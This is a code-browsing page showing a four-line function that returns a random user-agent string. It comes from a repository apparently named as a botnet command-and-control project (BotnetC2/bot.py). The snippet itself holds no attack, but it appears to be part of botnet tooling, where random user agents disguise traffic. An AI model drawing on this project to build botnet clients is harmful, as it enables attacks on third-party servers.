Code
Hub
Workspaces
Following
Trending
Connect
MCP
copy
Create free account
hub
/
github.com/Hex1629/BotnetC2
/ user_gen2
Function
user_gen2
BOTNETc2/bot.py:182–185 ·
view source on GitHub ↗
()
Source
from the content-addressed store, hash-verified
180
return
data
181
182
def
user_gen2():
183
ua = UserAgent()
184
data = ua.random
185
return
data
186
187
def
rand_ua(mode):
188
if
"FakeUser"
in mode:
Callers
1
rand_ua
Function · 0.70
Calls
no outgoing calls
Tested by
no test coverage detected